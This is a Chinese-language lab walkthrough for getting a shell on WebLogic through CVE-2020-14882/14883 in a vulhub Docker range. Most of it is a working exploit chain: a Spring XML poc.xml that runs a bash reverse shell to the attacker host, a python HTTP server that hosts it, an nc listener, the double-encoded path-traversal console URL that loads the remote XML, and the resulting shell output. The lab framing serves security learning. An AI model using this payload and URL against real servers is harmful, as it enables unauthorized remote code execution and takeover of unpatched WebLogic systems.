WebLogic: CVE-2020-14882/14883【getshell】
漏洞介绍
环境搭建
1.进入靶场目录
2.开启靶场【报错重启docker服务】
[root@localhost CVE-2020-14882]# docker-compose up -d
Starting cve-2020-14882_weblogic_1 ... done
3.查看靶场端口
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
480b96ac8c82 vulhub/weblogic:12.2.1.3-2018 "/u01/oracle/createA…" 2 minutes ago Up About a minute 0.0.0.0:7001->7001/tcp, :::7001->7001/tcp cve-2020-14882_weblogic_1
4. 访问靶场
http://192.168.10.5:7001/
漏洞利用
1. 输入网址查看是否存在未授权访问
2.编写poc
poc.xml
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans
http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>/bin/bash</value>
<value>-c</value>
<value><![CDATA[bash -i &> /dev/tcp/192.168.10.128/5555 0<&1]]></value>
</list>
</constructor-arg>
</bean>
</beans>
3. 攻击机开启http服务并访问
┌──(root㉿kali)-[~]
└─# python -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
4.监听本机 5555 端口
┌──(root㉿kali)-[~]
└─# nc -lvp 5555
listening on [any] 5555 ...
5.访问url
http://192.168.10.5:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://192.168.10.128:8888/poc.xml")
6.建立反弹链接
┌──(root㉿kali)-[~]
└─# nc -lvp 5555
listening on [any] 5555 ...
192.168.10.5: inverse host lookup failed: Unknown host
connect to [192.168.10.128] from (UNKNOWN) [192.168.10.5] 58624
bash: no job control in this shell
[oracle@480b96ac8c82 base_domain]$ ls